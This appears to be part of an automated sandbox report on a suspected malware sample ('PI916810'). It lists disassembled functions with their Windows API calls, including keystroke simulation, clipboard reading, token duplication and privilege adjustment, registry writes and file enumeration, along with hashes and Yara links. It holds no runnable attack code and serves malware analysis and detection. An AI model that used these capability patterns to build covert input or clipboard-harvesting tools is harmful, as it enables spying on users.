                                                                                                                                                                            • API String ID: 3850602802-328681919
                                                                                                                                                                            • Opcode ID: 9ee23ebfb2f9abcc9c0d555a04856e6f8aea0ce1aa1da225bb96c9368250b287
                                                                                                                                                                            • Instruction ID: 4f5a19f27e726066f36c393957073ea541a704cd44cd6f9c88e32480f17c8423
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ee23ebfb2f9abcc9c0d555a04856e6f8aea0ce1aa1da225bb96c9368250b287
                                                                                                                                                                            • Instruction Fuzzy Hash: A412D170500284ABEF259F26CC89FAF7BB4EF45311F10416EF919EA2A1DF788945CB19
                                                                                                                                                                            Function 0047710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$_memset
                                                                                                                                                                            • String ID: 0wQ$DEFINE$OaG$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                                                                                                            • API String ID: 1357608183-1737681961
                                                                                                                                                                            • Opcode ID: f5b015041815f126837a4a70679dfe8bb5f25db7c5d2b663159009e9d3979912
                                                                                                                                                                            • Instruction ID: 0a23a22fa6a4a2c79f621f736089c81578f99a04eac009aa098c24d78aa8f53c
                                                                                                                                                                            • Opcode Fuzzy Hash: f5b015041815f126837a4a70679dfe8bb5f25db7c5d2b663159009e9d3979912
                                                                                                                                                                            • Instruction Fuzzy Hash: 7493A271A00215DBDB24CF59C8817EEB7B1FF48310F65816BE949AB381E7789D82CB58
                                                                                                                                                                            Function 00464A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00464A3D
                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0049DA8E
                                                                                                                                                                            • IsIconic.USER32(?), ref: 0049DA97
                                                                                                                                                                            • ShowWindow.USER32(?,00000009), ref: 0049DAA4
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0049DAAE
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0049DAC4
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0049DACB
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0049DAD7
                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0049DAE8
                                                                                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 0049DAF0
                                                                                                                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 0049DAF8
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0049DAFB
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB10
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB1B
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB25
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB2A
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB33
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB38
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0049DB42
                                                                                                                                                                            • keybd_event.USER32(00000012,00000000), ref: 0049DB47
                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 0049DB4A
                                                                                                                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 0049DB71
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                            • API String ID: 4125248594-2988720461
                                                                                                                                                                            • Opcode ID: 51955a676c3d1ebc6369651e989be014844f94a095b71c7fc7d9ac7197934d9f
                                                                                                                                                                            • Instruction ID: e0a8808433ff5e44dc6bb65cd115e220310fc68b68ff3c6cc82b49b05fa81eae
                                                                                                                                                                            • Opcode Fuzzy Hash: 51955a676c3d1ebc6369651e989be014844f94a095b71c7fc7d9ac7197934d9f
                                                                                                                                                                            • Instruction Fuzzy Hash: A1318471E40358BBEF205FA19C89F7F3E6CEB44B50F114036FA04AA1D2C6745D01ABA9
                                                                                                                                                                            Function 004B8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B8D0D
                                                                                                                                                                              • Part of subcall function 004B8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B8D3A
                                                                                                                                                                              • Part of subcall function 004B8CC3: GetLastError.KERNEL32 ref: 004B8D47
                                                                                                                                                                            • _memset.LIBCMT ref: 004B889B
                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004B88ED
                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004B88FE
                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004B8915
                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 004B892E
                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 004B8938
                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004B8952
                                                                                                                                                                              • Part of subcall function 004B8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004B8851), ref: 004B8728
                                                                                                                                                                              • Part of subcall function 004B8713: CloseHandle.KERNEL32(?,?,004B8851), ref: 004B873A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                            • API String ID: 2063423040-1027155976
                                                                                                                                                                            • Opcode ID: 07c1fa08b7b1a8b2ba5efee8ddef0586f891a0f33cedd4cf610eea8875f10796
                                                                                                                                                                            • Instruction ID: f546c2d0a750ad8eee12fa9421c1d3368994a7389ede8a826de4e54e26427e14
                                                                                                                                                                            • Opcode Fuzzy Hash: 07c1fa08b7b1a8b2ba5efee8ddef0586f891a0f33cedd4cf610eea8875f10796
                                                                                                                                                                            • Instruction Fuzzy Hash: E6812A71900249AFDF11DFA4DC45AEEBBBDAF08304F18416EF910A6261DB398E15DB78
                                                                                                                                                                            Function 004D425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenClipboard.USER32(004EF910), ref: 004D4284
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 004D4292
                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 004D429A
                                                                                                                                                                            • CloseClipboard.USER32 ref: 004D42A6
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004D42C2
                                                                                                                                                                            • CloseClipboard.USER32 ref: 004D42CC
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004D42E1
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 004D42EE
                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 004D42F6
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004D4303
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004D4337
                                                                                                                                                                            • CloseClipboard.USER32 ref: 004D4447
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3222323430-0
                                                                                                                                                                            • Opcode ID: f2b230849bad8f048e68577d8643e151a4828a2ba3b975cd7a5b55f3973c028d
                                                                                                                                                                            • Instruction ID: 2cd97f2121398f119dfa29e6be8ba88c09709b0769e2e73818c9e96a628e5a72
                                                                                                                                                                            • Opcode Fuzzy Hash: f2b230849bad8f048e68577d8643e151a4828a2ba3b975cd7a5b55f3973c028d
                                                                                                                                                                            • Instruction Fuzzy Hash: 7151C135204241ABD701EF61DC96F6F77A8AF84B04F00453FF545D62A2EB78D9098B6A
                                                                                                                                                                            Function 004CC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004CC9F8
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CCA4C
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004CCA71
                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004CCA88
                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 004CCAAF
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCAFB
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCB3E
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCB92
                                                                                                                                                                              • Part of subcall function 004838D8: __woutput_l.LIBCMT ref: 00483931
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCBE0
                                                                                                                                                                              • Part of subcall function 004838D8: __flsbuf.LIBCMT ref: 00483953
                                                                                                                                                                              • Part of subcall function 004838D8: __flsbuf.LIBCMT ref: 0048396B
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCC2F
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCC7E
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CCCCD
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                            • API String ID: 3953360268-2428617273
                                                                                                                                                                            • Opcode ID: fad89159de70a2eb07f5f481904a035808f2a48015e756cecc6a1d0e0eeb8730
                                                                                                                                                                            • Instruction ID: 9b4dee882f5d59ab36e0c043f3a3867ac4bf6c887dfdf24d0c106c7e638877ae
                                                                                                                                                                            • Opcode Fuzzy Hash: fad89159de70a2eb07f5f481904a035808f2a48015e756cecc6a1d0e0eeb8730
                                                                                                                                                                            • Instruction Fuzzy Hash: D6A12FB1508344ABC704EF95C895DAFB7ECAF94704F40492EF58587192FA78DA08C767
                                                                                                                                                                            Function 004CF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004CF221
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF236
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF24D
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 004CF25F
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 004CF279
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 004CF291
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF29C
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 004CF2B8
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF2DF
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF2F6
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004CF308
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0051A5A0), ref: 004CF326
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004CF330
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF33D
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF34F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1803514871-438819550
                                                                                                                                                                            • Opcode ID: 36a13e2b035ee44260600499ad4021bc1557f87695c536c05601ba39416cdedc
                                                                                                                                                                            • Instruction ID: 334ff999e0d9361d7be569f4d9b7424c6e55eaca0c05abdfb03c54ffc286fa19
                                                                                                                                                                            • Opcode Fuzzy Hash: 36a13e2b035ee44260600499ad4021bc1557f87695c536c05601ba39416cdedc
                                                                                                                                                                            • Instruction Fuzzy Hash: A031C47A5012496ADB50DBB0DC88FDE77ADAF48361F1041BAED00D31A1EB39DA498A58
                                                                                                                                                                            Function 004E0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0BDE
                                                                                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,004EF910,00000000,?,00000000,?,?), ref: 004E0C4C
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004E0C94
                                                                                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004E0D1D
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004E103D
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E104A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                            • API String ID: 536824911-966354055
                                                                                                                                                                            • Opcode ID: b74c3b26f112ee47c26c5edb7efda0f7f8286d500a3b8f36aed098e40b1b3905
                                                                                                                                                                            • Instruction ID: 0364f1fef5fc2ad762c244b4095287674be5cf87c41e3a562219396e0a5029a6
                                                                                                                                                                            • Opcode Fuzzy Hash: b74c3b26f112ee47c26c5edb7efda0f7f8286d500a3b8f36aed098e40b1b3905
                                                                                                                                                                            • Instruction Fuzzy Hash: D202A2752006419FCB14EF16C891E2AB7E5FF88714F04885EF8999B362DB78EC45CB4A
                                                                                                                                                                            Function 004CF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004CF37E
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF393
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF3AA
                                                                                                                                                                              • Part of subcall function 004C45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004C45DC
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 004CF3D9
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF3E4
                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 004CF400
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF427
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004CF43E
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004CF450
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(0051A5A0), ref: 004CF46E
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 004CF478
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF485
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004CF497
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 1824444939-438819550
                                                                                                                                                                            • Opcode ID: d0ecee2f41787ddd1a0c650d835f9f58904ab970f0b545fa2ca3cc98c1450a69
                                                                                                                                                                            • Instruction ID: 2a7c90cb63b616b1702b4fc090c4818281bdae08e1612c36a97e9ead7d1d07a8
                                                                                                                                                                            • Opcode Fuzzy Hash: d0ecee2f41787ddd1a0c650d835f9f58904ab970f0b545fa2ca3cc98c1450a69
                                                                                                                                                                            • Instruction Fuzzy Hash: 4831B3765012596ADB14ABA4EC88FDF77AD9F49325F1041BBE800E21A1D73CDA48CA5C
                                                                                                                                                                            Function 00476843 Relevance: 22.1, Strings: 17, Instructions: 883COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -es$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$OaG$PJP$UCP)$UTF)$UTF16)
                                                                                                                                                                            • API String ID: 0-3192530332
                                                                                                                                                                            • Opcode ID: 0e2acf74521e88d2206186013651f1ec47cfed3d1c417cb6d07c824ab9494661
                                                                                                                                                                            • Instruction ID: 085cabe1337b6822ec943b3baa25c4d2857e86564ec5398e686033f752d39038
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e2acf74521e88d2206186013651f1ec47cfed3d1c417cb6d07c824ab9494661
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F728F71E006199BDB24CF59C8907EEB7B6FF48310F55816BE809EB390DB389981CB95
                                                                                                                                                                            Function 004B81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B8766
                                                                                                                                                                              • Part of subcall function 004B874A: GetLastError.KERNEL32(?,004B822A,?,?,?), ref: 004B8770
                                                                                                                                                                              • Part of subcall function 004B874A: GetProcessHeap.KERNEL32(00000008,?,?,004B822A,?,?,?), ref: 004B877F
                                                                                                                                                                              • Part of subcall function 004B874A: HeapAlloc.KERNEL32(00000000,?,004B822A,?,?,?), ref: 004B8786
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B879D
                                                                                                                                                                              • Part of subcall function 004B87E7: GetProcessHeap.KERNEL32(00000008,004B8240,00000000,00000000,?,004B8240,?), ref: 004B87F3
                                                                                                                                                                              • Part of subcall function 004B87E7: HeapAlloc.KERNEL32(00000000,?,004B8240,?), ref: 004B87FA
                                                                                                                                                                              • Part of subcall function 004B87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004B8240,?), ref: 004B880B
                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B825B
                                                                                                                                                                            • _memset.LIBCMT ref: 004B8270
                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B828F
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B82A0
                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004B82DD
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B82F9
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B8316
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004B8325
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004B832C
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B834D
                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 004B8354
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B8385
                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B83AB
                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B83BF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
